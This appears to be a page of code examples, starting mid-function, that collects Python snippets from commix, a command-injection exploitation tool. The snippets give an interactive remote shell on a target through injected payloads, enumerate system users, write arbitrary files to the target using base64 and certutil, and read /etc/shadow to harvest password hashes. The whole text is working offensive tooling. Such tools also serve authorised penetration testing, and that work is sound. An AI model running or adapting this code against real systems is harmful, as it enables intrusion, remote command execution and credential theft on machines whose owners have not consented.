                                shell[0],
                                vuln_parameter,
                                prefix,
                                suffix,
                                TAG,
                                alter_shell,
                                payload,
                                http_request_method,
                                url_time_response=0,
                                timesec=0,
                                how_long=0,
                                output_length=0,
                                is_vulnerable=menu.options.level)
                        else:
                            whitespace = settings.WHITESPACE[0]
                            settings.LOAD_SESSION = False

                        # Check for any enumeration options.
                        new_line = True
                        if settings.ENUMERATION_DONE == True:
                            while True:
                                if not menu.options.batch:
                                    question_msg = "Do you want to enumerate again? [Y/n] > "
                                    enumerate_again = _input(
                                        "\n" + settings.print_question_msg(
                                            question_msg)).lower()
                                else:
                                    enumerate_again = ""
                                if len(enumerate_again) == 0:
                                    enumerate_again = "y"
                                if enumerate_again in settings.CHOICE_YES:
                                    fb_enumeration.do_check(
                                        separator, payload, TAG, timesec,
                                        prefix, suffix, whitespace,
                                        http_request_method, url,
                                        vuln_parameter, OUTPUT_TEXTFILE,
                                        alter_shell, filename)
                                    # print("")
                                    break
                                elif enumerate_again in settings.CHOICE_NO:
                                    new_line = False
                                    break
                                elif file_access_again in settings.CHOICE_QUIT:
                                    # Delete previous shell (text) files (output)
                                    delete_previous_shell(
                                        separator, payload, TAG, prefix,
                                        suffix, whitespace,
                                        http_request_method, url,
                                        vuln_parameter, OUTPUT_TEXTFILE,
                                        alter_shell, filename)
                                    raise SystemExit()
                                else:
                                    err_msg = "'" + enumerate_again + "' is not a valid answer."
                                    print(settings.print_error_msg(err_msg))
                                    pass
                        else:
                            if menu.enumeration_options():
                                fb_enumeration.do_check(
                                    separator, payload, TAG, timesec, prefix,
                                    suffix, whitespace, http_request_method,
                                    url, vuln_parameter, OUTPUT_TEXTFILE,
                                    alter_shell, filename)

                        if not menu.file_access_options(
                        ) and not menu.options.os_cmd:
                            if not settings.VERBOSITY_LEVEL >= 1 and new_line:
                                print("")

                        # Check for any system file access options.
                        if settings.FILE_ACCESS_DONE == True:
                            if settings.ENUMERATION_DONE != True:
                                print("")
                            while True:
                                if not menu.options.batch:
                                    question_msg = "Do you want to access files again? [Y/n] > "
                                    file_access_again = _input(
                                        settings.print_question_msg(
                                            question_msg))
                                else:
                                    file_access_again = ""
                                if len(file_access_again) == 0:
                                    file_access_again = "y"
                                if file_access_again in settings.CHOICE_YES:
                                    fb_file_access.do_check(
                                        separator, payload, TAG, timesec,
                                        prefix, suffix, whitespace,
                                        http_request_method, url,
                                        vuln_parameter, OUTPUT_TEXTFILE,
                                        alter_shell, filename)
                                    print("")
                                    break
                                elif file_access_again in settings.CHOICE_NO:
                                    break
                                elif file_access_again in settings.CHOICE_QUIT:
                                    # Delete previous shell (text) files (output)
                                    delete_previous_shell(
                                        separator, payload, TAG, prefix,
                                        suffix, whitespace,
                                        http_request_method, url,
                                        vuln_parameter, OUTPUT_TEXTFILE,
                                        alter_shell, filename)
                                    raise SystemExit()
                                else:
                                    err_msg = "'" + enumerate_again + "' is not a valid answer."
                                    print(settings.print_error_msg(err_msg))
                                    pass
                        else:
                            if menu.file_access_options():
                                # if not menu.enumeration_options():
                                #   print("")
                                fb_file_access.do_check(
                                    separator, payload, TAG, timesec, prefix,
                                    suffix, whitespace, http_request_method,
                                    url, vuln_parameter, OUTPUT_TEXTFILE,
                                    alter_shell, filename)
                                print("")

                        # Check if defined single cmd.
                        if menu.options.os_cmd:
                            # if not menu.file_access_options():
                            #   print("")
                            fb_enumeration.single_os_cmd_exec(
                                separator, payload, TAG, timesec, prefix,
                                suffix, whitespace, http_request_method, url,
                                vuln_parameter, OUTPUT_TEXTFILE, alter_shell,
                                filename)
                            # Delete previous shell (text) files (output)
                            delete_previous_shell(separator, payload, TAG,
                                                  prefix, suffix, whitespace,
                                                  http_request_method, url,
                                                  vuln_parameter,
                                                  OUTPUT_TEXTFILE, alter_shell,
                                                  filename)
                            raise SystemExit()

                        try:
                            # Pseudo-Terminal shell
                            go_back = False
                            go_back_again = False
                            while True:
                                # Delete previous shell (text) files (output)
                                # if settings.VERBOSITY_LEVEL >= 1:
                                #   print("")
                                delete_previous_shell(
                                    separator, payload, TAG, prefix, suffix,
                                    whitespace, http_request_method, url,
                                    vuln_parameter, OUTPUT_TEXTFILE,
                                    alter_shell, filename)
                                if settings.VERBOSITY_LEVEL >= 1:
                                    print("")
                                if go_back == True:
                                    break
                                if not menu.options.batch:
                                    question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                                    gotshell = _input(
                                        settings.print_question_msg(
                                            question_msg))
                                else:
                                    gotshell = ""
                                if len(gotshell) == 0:
                                    gotshell = "y"
                                if gotshell in settings.CHOICE_YES:
                                    if not menu.options.batch:
                                        print("")
                                    print("Pseudo-Terminal (type '" +
                                          Style.BRIGHT + "?" +
                                          Style.RESET_ALL +
                                          "' for available options)")
                                    if readline_error:
                                        checks.no_readline_module()
                                    while True:
                                        # Tab compliter
                                        if not readline_error:
                                            readline.set_completer(
                                                menu.tab_completer)
                                            # MacOSX tab compliter
                                            if getattr(
                                                    readline, '__doc__', ''
                                            ) is not None and 'libedit' in getattr(
                                                    readline, '__doc__', ''):
                                                readline.parse_and_bind(
                                                    "bind ^I rl_complete")
                                            # Unix tab compliter
                                            else:
                                                readline.parse_and_bind(
                                                    "tab: complete")
                                        cmd = _input("""commix(""" +
                                                     Style.BRIGHT + Fore.RED +
                                                     """os_shell""" +
                                                     Style.RESET_ALL +
                                                     """) > """)
                                        cmd = checks.escaped_cmd(cmd)
                                        # if settings.VERBOSITY_LEVEL >= 1:
                                        #   print("")
                                        if cmd.lower(
                                        ) in settings.SHELL_OPTIONS:
                                            go_back, go_back_again = shell_options.check_option(
                                                separator, TAG, cmd, prefix,
                                                suffix, whitespace,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell,
                                                filename, technique, go_back,
                                                no_result, timesec,
                                                go_back_again, payload,
                                                OUTPUT_TEXTFILE)
                                            if go_back and go_back_again == False:
                                                break
                                            if go_back and go_back_again:
                                                return True
                                        else:
                                            time.sleep(timesec)
                                            response = fb_injector.injection(
                                                separator, payload, TAG, cmd,
                                                prefix, suffix, whitespace,
                                                http_request_method, url,
                                                vuln_parameter,
                                                OUTPUT_TEXTFILE, alter_shell,
                                                filename)
                                            if menu.options.ignore_session or \
                                               session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
                                                # Command execution results.
                                                shell = fb_injector.injection_results(
                                                    url, OUTPUT_TEXTFILE,
                                                    timesec)
                                                shell = "".join(
                                                    str(p) for p in shell)
                                                if not menu.options.ignore_session:
                                                    session_handler.store_cmd(
                                                        url, cmd, shell,
                                                        vuln_parameter)
                                            else:
                                                shell = session_handler.export_stored_cmd(
                                                    url, cmd, vuln_parameter)
                                            if shell:
                                                if shell != "":
                                                    # Update logs with executed cmds and execution results.
                                                    logs.executed_command(
                                                        filename, cmd, shell)
                                                    print("\n" + Fore.GREEN +
                                                          Style.BRIGHT +
                                                          shell +
                                                          Style.RESET_ALL +
                                                          "\n")

                                            if not shell or shell == "":
                                                if settings.VERBOSITY_LEVEL >= 1:
                                                    print("")
                                                err_msg = "The '" + cmd + "' command, does not return any output."
                                                print(
                                                    settings.
                                                    print_critical_msg(
                                                        err_msg) + "\n")

                                elif gotshell in settings.CHOICE_NO:
                                    if checks.next_attack_vector(
                                            technique, go_back) == True:
                                        break
                                    else:
                                        if no_result == True:
                                            return False
                                        else:
                                            return True

                                elif gotshell in settings.CHOICE_QUIT:
                                    # Delete previous shell (text) files (output)
                                    delete_previous_shell(
                                        separator, payload, TAG, prefix,
                                        suffix, whitespace,
                                        http_request_method, url,
                                        vuln_parameter, OUTPUT_TEXTFILE,
                                        alter_shell, filename)
                                    raise SystemExit()
                                else:
                                    err_msg = "'" + gotshell + "' is not a valid answer."
                                    print(settings.print_error_msg(err_msg))
                                    pass

                        except KeyboardInterrupt:
                            # if settings.VERBOSITY_LEVEL >= 1:
                            print("")
                            # Delete previous shell (text) files (output)
                            delete_previous_shell(separator, payload, TAG,
                                                  prefix, suffix, whitespace,
                                                  http_request_method, url,
                                                  vuln_parameter,
                                                  OUTPUT_TEXTFILE, alter_shell,
                                                  filename)
                            raise

    if no_result == True:
        if settings.VERBOSITY_LEVEL == 0:
            print("")
        return False
    else:
        sys.stdout.write("\r")
        sys.stdout.flush()
Example #57
0
def system_users(separator, payload, TAG, delay, prefix, suffix,
                 http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
                 alter_shell, filename):
    if settings.TARGET_OS == "win":
        settings.SYS_USERS = settings.WIN_SYS_USERS
        settings.SYS_USERS = settings.SYS_USERS + "-replace('\s+',' '))"
        if alter_shell:
            settings.SYS_USERS = settings.SYS_USERS.replace("'", "\\'")
    cmd = settings.SYS_USERS
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, http_request_method, url,
                                     vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
    sys_users = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    # Windows users enumeration.
    if settings.TARGET_OS == "win":
        if menu.options.verbose:
            print ""
        sys.stdout.write(
            settings.INFO_SIGN +
            "Executing the 'net users' command to enumerate users entries... ")
        sys.stdout.flush()
        if sys_users[0]:
            sys_users = "".join(str(p) for p in sys_users).strip()
            sys.stdout.write("[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL +
                             " ]")
            sys_users_list = re.findall(r"(.*)", sys_users)
            sys_users_list = "".join(str(p) for p in sys_users_list).strip()
            sys_users_list = ' '.join(sys_users_list.split())
            sys_users_list = sys_users_list.split()
            sys.stdout.write(Style.BRIGHT + "\n(!) Identified " +
                             str(len(sys_users_list)) + " entr" +
                             ('ies', 'y')[len(sys_users_list) == 1] +
                             " via 'net users' command.\n" + Style.RESET_ALL)
            sys.stdout.flush()
            # Add infos to logs file.
            output_file = open(filename, "a")
            output_file.write("\n    (!) Identified " +
                              str(len(sys_users_list)) + " entr" +
                              ('ies', 'y')[len(sys_users_list) == 1] +
                              " in via 'net users' command.\n")
            output_file.close()
            count = 0
            for user in range(0, len(sys_users_list)):
                count = count + 1
                if menu.options.privileges:
                    cmd = "powershell.exe -InputFormat none write-host (([string]$(net user " + sys_users_list[
                        user] + ")[22..($(net user " + sys_users_list[
                            user] + ").length-3)]).replace('Local Group Memberships','').replace('*','').Trim()).replace(' ','')"
                    if alter_shell:
                        cmd = cmd.replace("'", "\\'")
                    response = fb_injector.injection(separator, payload, TAG,
                                                     cmd, prefix, suffix,
                                                     http_request_method, url,
                                                     vuln_parameter,
                                                     OUTPUT_TEXTFILE,
                                                     alter_shell, filename)
                    check_privs = fb_injector.injection_results(
                        url, OUTPUT_TEXTFILE, delay)
                    check_privs = "".join(str(p) for p in check_privs).strip()
                    check_privs = re.findall(r"(.*)", check_privs)
                    check_privs = "".join(str(p) for p in check_privs).strip()
                    check_privs = check_privs.split()
                    if "Admin" in check_privs[0]:
                        is_privileged = Style.RESET_ALL + " is" + Style.BRIGHT + " admin user"
                        is_privileged_nh = " is admin user "
                    else:
                        is_privileged = Style.RESET_ALL + " is" + Style.BRIGHT + " regular user"
                        is_privileged_nh = " is regular user "
                else:
                    is_privileged = ""
                    is_privileged_nh = ""
                if menu.options.verbose:
                    print ""
                print "  (" + str(
                    count
                ) + ") '" + Style.BRIGHT + Style.UNDERLINE + sys_users_list[
                    user] + Style.RESET_ALL + "'" + Style.BRIGHT + is_privileged + Style.RESET_ALL + "."
                # Add infos to logs file.
                output_file = open(filename, "a")
                output_file.write("      (" + str(count) + ") " +
                                  sys_users_list[user] + is_privileged + ".\n")
                output_file.close()
        else:
            sys.stdout.write("[ " + Fore.RED + "FAILED" + Style.RESET_ALL +
                             " ]")
            sys.stdout.flush()
            print "\n" + Fore.YELLOW + settings.WARNING_SIGN + "It seems that you don't have permissions to enumerate users entries." + Style.RESET_ALL
    # Unix-like users enumeration.
    else:
        if menu.options.verbose:
            print ""
        sys.stdout.write(settings.INFO_SIGN + "Fetching '" +
                         settings.PASSWD_FILE +
                         "' to enumerate users entries... ")
        sys.stdout.flush()
        if sys_users[0]:
            sys_users = "".join(str(p) for p in sys_users).strip()
            if len(sys_users.split(" ")) <= 1:
                sys_users = sys_users.split("\n")
            else:
                sys_users = sys_users.split(" ")
            # Check for appropriate '/etc/passwd' format.
            if len(sys_users) % 3 != 0:
                sys.stdout.write("[ " + Fore.RED + "FAILED" + Style.RESET_ALL +
                                 " ]")
                sys.stdout.flush()
                print "\n" + Fore.YELLOW + settings.WARNING_SIGN + "It seems that '" + settings.PASSWD_FILE + "' file is not in the appropriate format. Thus, it is expoted as a text file." + Style.RESET_ALL
                sys_users = " ".join(str(p) for p in sys_users).strip()
                print sys_users
                output_file = open(filename, "a")
                output_file.write("      " + sys_users)
                output_file.close()
            else:
                sys_users_list = []
                for user in range(0, len(sys_users), 3):
                    sys_users_list.append(sys_users[user:user + 3])
                if len(sys_users_list) != 0:
                    sys.stdout.write("[ " + Fore.GREEN + "SUCCEED" +
                                     Style.RESET_ALL + " ]")
                    sys.stdout.write(Style.BRIGHT + "\n(!) Identified " +
                                     str(len(sys_users_list)) + " entr" +
                                     ('ies', 'y')[len(sys_users_list) == 1] +
                                     " in '" + settings.PASSWD_FILE + "'.\n" +
                                     Style.RESET_ALL)
                    sys.stdout.flush()
                    # Add infos to logs file.
                    output_file = open(filename, "a")
                    output_file.write("\n    (!) Identified " +
                                      str(len(sys_users_list)) + " entr" +
                                      ('ies', 'y')[len(sys_users_list) == 1] +
                                      " in '" + settings.PASSWD_FILE + "'.\n")
                    output_file.close()
                    count = 0
                    for user in range(0, len(sys_users_list)):
                        sys_users = sys_users_list[user]
                        sys_users = ":".join(str(p) for p in sys_users)
                        count = count + 1
                        fields = sys_users.split(":")
                        fields1 = "".join(str(p) for p in fields)
                        # System users privileges enumeration
                        try:
                            if not fields[2].startswith("/"):
                                raise ValueError()
                            if menu.options.privileges:
                                if int(fields[1]) == 0:
                                    is_privileged = Style.RESET_ALL + " is" + Style.BRIGHT + " root user "
                                    is_privileged_nh = " is root user "
                                elif int(fields[1]) > 0 and int(
                                        fields[1]) < 99:
                                    is_privileged = Style.RESET_ALL + " is" + Style.BRIGHT + " system user "
                                    is_privileged_nh = " is system user "
                                elif int(fields[1]) >= 99 and int(
                                        fields[1]) < 65534:
                                    if int(fields[1]) == 99 or int(
                                            fields[1]) == 60001 or int(
                                                fields[1]) == 65534:
                                        is_privileged = Style.RESET_ALL + " is" + Style.BRIGHT + " anonymous user "
                                        is_privileged_nh = " is anonymous user "
                                    elif int(fields[1]) == 60002:
                                        is_privileged = Style.RESET_ALL + " is" + Style.BRIGHT + " non-trusted user "
                                        is_privileged_nh = " is non-trusted user "
                                    else:
                                        is_privileged = Style.RESET_ALL + " is" + Style.BRIGHT + " regular user "
                                        is_privileged_nh = " is regular user "
                                else:
                                    is_privileged = ""
                                    is_privileged_nh = ""
                            else:
                                is_privileged = ""
                                is_privileged_nh = ""
                            print "  (" + str(
                                count
                            ) + ") '" + Style.BRIGHT + Style.UNDERLINE + fields[
                                0] + Style.RESET_ALL + "'" + Style.BRIGHT + is_privileged + Style.RESET_ALL + "(uid=" + fields[
                                    1] + "). Home directory is in '" + Style.BRIGHT + fields[
                                        2] + Style.RESET_ALL + "'."
                            # Add infos to logs file.
                            output_file = open(filename, "a")
                            output_file.write("      (" + str(count) + ") '" +
                                              fields[0] + "'" +
                                              is_privileged_nh + "(uid=" +
                                              fields[1] +
                                              "). Home directory is in '" +
                                              fields[2] + "'.\n")
                            output_file.close()
                        except ValueError:
                            if count == 1:
                                print Fore.YELLOW + settings.WARNING_SIGN + "It seems that '" + settings.PASSWD_FILE + "' file is not in the appropriate format. Thus, it is expoted as a text file." + Style.RESET_ALL
                            sys_users = " ".join(
                                str(p) for p in sys_users.split(":"))
                            print sys_users
                            output_file = open(filename, "a")
                            output_file.write("      " + sys_users)
                            output_file.close()
        else:
            sys.stdout.write("[ " + Fore.RED + "FAILED" + Style.RESET_ALL +
                             " ]")
            sys.stdout.flush()
            print "\n" + Fore.YELLOW + settings.WARNING_SIGN + "It seems that you don't have permissions to read '" + settings.PASSWD_FILE + "' to enumerate users entries." + Style.RESET_ALL
Example #58
0
def file_write(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  file_to_write = menu.options.file_write
  if not os.path.exists(file_to_write):
    warn_msg = "It seems that the '" + file_to_write + "' file, does not exists."
    sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
    sys.stdout.flush()
    sys.exit(0)
    
  if os.path.isfile(file_to_write):
    with open(file_to_write, 'r') as content_file:
      content = [line.replace("\r\n", "\n").replace("\r", "\n").replace("\n", " ") for line in content_file]
    content = "".join(str(p) for p in content).replace("'", "\"")
    if settings.TARGET_OS == "win":
      import base64
      content = base64.b64encode(content)
  else:
    warn_msg = "It seems that '" + file_to_write + "' is not a file."
    sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
    sys.stdout.flush()
    
  if os.path.split(menu.options.file_dest)[1] == "" :
    dest_to_write = os.path.split(menu.options.file_dest)[0] + "/" + os.path.split(menu.options.file_write)[1]
  elif os.path.split(menu.options.file_dest)[0] == "/":
    dest_to_write = "/" + os.path.split(menu.options.file_dest)[1] + "/" + os.path.split(menu.options.file_write)[1]
  else:
    dest_to_write = menu.options.file_dest

  # Execute command
  if settings.TARGET_OS == "win":
    dest_to_write = dest_to_write.replace("\\","/")
    # Find path
    path = os.path.dirname(dest_to_write)
    path = path.replace("/","\\")
    # Chnage directory
    cmd = "cd " + path + separator +separator + " " + settings.WIN_COMMENT
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    # Find filename
    filname = os.path.basename(dest_to_write)
    tmp_filname = "tmp_" + filname
    cmd = settings.FILE_WRITE + " " + content + ">" + tmp_filname + separator + " " + settings.WIN_COMMENT
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    # Decode base 64 encoding
    cmd = "certutil -decode "  + tmp_filname + " " + filname + separator + " " + settings.WIN_COMMENT
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)  
    #fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    # Delete tmp file
    cmd = "del "  + tmp_filname + separator + " " + settings.WIN_COMMENT
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)  
    #fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    # Check if file exists
    cmd = "cmd /c if exist " + filname + " (echo " + filname + ")" 
    dest_to_write = path + "\\" + filname 

  else:
    cmd = settings.FILE_WRITE + " '" + content + "'" + ">" + "'" + dest_to_write + "'" + settings.COMMENT
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    # Check if file exists
    cmd = "echo $(ls " + dest_to_write + ")"

  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  shell = "".join(str(p) for p in shell)
  if shell:
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
    success_msg = "The " +  shell + Style.RESET_ALL
    success_msg += Style.BRIGHT + " file was created successfully!" + "\n" 
    sys.stdout.write(settings.print_success_msg(success_msg))
    sys.stdout.flush()
  else:
    warn_msg = "It seems that you don't have permissions to write the '" + dest_to_write + "' file."
    sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
    sys.stdout.flush()
Example #59
0
def system_passwords(separator, payload, TAG, timesec, prefix, suffix,
                     whitespace, http_request_method, url, vuln_parameter,
                     OUTPUT_TEXTFILE, alter_shell, filename):
    if settings.TARGET_OS == "win":
        # Not yet implemented!
        pass
    else:
        cmd = settings.SYS_PASSES
        if session_handler.export_stored_cmd(
                url, cmd,
                vuln_parameter) == None or menu.options.ignore_session:
            # Command execution results.
            response = fb_injector.injection(separator, payload, TAG, cmd,
                                             prefix, suffix, whitespace,
                                             http_request_method, url,
                                             vuln_parameter, OUTPUT_TEXTFILE,
                                             alter_shell, filename)
            # Evaluate injection results.
            sys_passes = fb_injector.injection_results(url, OUTPUT_TEXTFILE,
                                                       timesec)
            sys_passes = "".join(str(p) for p in sys_passes)
            session_handler.store_cmd(url, cmd, sys_passes, vuln_parameter)
        else:
            sys_passes = session_handler.export_stored_cmd(
                url, cmd, vuln_parameter)
        if sys_passes == "":
            sys_passes = " "
            # if settings.VERBOSITY_LEVEL >= 1:
            #   print("")
            info_msg = "Fetching '" + settings.SHADOW_FILE
            info_msg += "' to enumerate users password hashes... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys_passes = "".join(str(p) for p in sys_passes)
            sys_passes = sys_passes.replace(" ", "\n")
            sys_passes = sys_passes.split()
            if len(sys_passes) != 0:
                sys.stdout.write("[ " + Fore.GREEN + "SUCCEED" +
                                 Style.RESET_ALL + " ]")
                success_msg = "Identified " + str(len(sys_passes))
                success_msg += " entr" + ('ies', 'y')[len(sys_passes) == 1]
                success_msg += " in '" + settings.SHADOW_FILE + "'.\n"
                sys.stdout.write("\n" +
                                 settings.print_success_msg(success_msg))
                sys.stdout.flush()
                # Add infos to logs file.
                output_file = open(filename, "a")
                output_file.write(
                    re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub(
                        "", settings.SUCCESS_SIGN) + success_msg)
                output_file.close()
                count = 0
                for line in sys_passes:
                    count = count + 1
                    try:
                        if ":" in line:
                            fields = line.split(":")
                            if not "*" in fields[1] and not "!" in fields[
                                    1] and fields[1] != "":
                                print("  (" + str(count) + ") " +
                                      Style.BRIGHT + fields[0] +
                                      Style.RESET_ALL + " : " + Style.BRIGHT +
                                      fields[1] + Style.RESET_ALL)
                                # Add infos to logs file.
                                output_file = open(filename, "a")
                                output_file.write("    (" + str(count) + ") " +
                                                  fields[0] + " : " +
                                                  fields[1] + "\n")
                                output_file.close()
                    # Check for appropriate '/etc/shadow' format.
                    except IndexError:
                        if count == 1:
                            warn_msg = "It seems that '" + settings.SHADOW_FILE + "' file is not "
                            warn_msg += "in the appropriate format. Thus, it is expoted as a text file."
                            sys.stdout.write(
                                settings.print_warning_msg(warn_msg) + "\n")
                        print(fields[0])
                        output_file = open(filename, "a")
                        output_file.write("      " + fields[0])
                        output_file.close()
            else:
                sys.stdout.write("[ " + Fore.RED + "FAILED" + Style.RESET_ALL +
                                 " ]")
                sys.stdout.flush()
                warn_msg = "It seems that you don't have permissions to read '"
                warn_msg += settings.SHADOW_FILE + "' to enumerate users password hashes."
                print("\n" + settings.print_warning_msg(warn_msg))